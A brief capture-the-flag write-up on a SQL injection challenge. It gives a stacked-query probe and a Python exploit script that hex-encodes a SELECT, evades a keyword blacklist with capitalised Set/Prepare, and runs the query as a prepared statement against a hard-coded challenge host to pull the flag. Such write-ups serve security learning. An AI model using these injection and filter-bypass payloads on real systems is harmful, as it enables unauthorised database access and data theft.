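[Web] 随便注 - LanceaKing

xp0int Posted on May 27 2019

`select` is filtered:

`return preg_match("/select|update|delete|drop|insert|where|\./i", $inject);`

Stacked queries are available:

`/?inject=1';show databases;show tables;%23`

`set` and `prepare` are filtered as well, but `strstr()` is case-sensitive, so writing them with an uppercase letter is enough to bypass the check:

`strstr($inject, "set") && strstr($inject, "prepare")`

exp.py:

```python
#coding=utf-8
# Python 2 script (print statement, str.encode('hex')).
import requests

# Table name: 1919810931114514
part_url='http://49.4.66.242:31368/?inject='

# The statement containing the filtered keyword is hex-encoded, so the
# keyword itself never appears in the request.
payload="select flag from `1919810931114514`;"
payload=payload.encode('hex')

# Capitalised Set/Prepare get past the case-sensitive strstr() check;
# the hex literal is then run as a prepared statement via stacked queries.
payload='''1';Set @x=0x'''+str(payload)+''';Prepare a from @x;execute a;%23'''
print payload

full_url=part_url+payload
r=requests.get(url=full_url)
print r.content
```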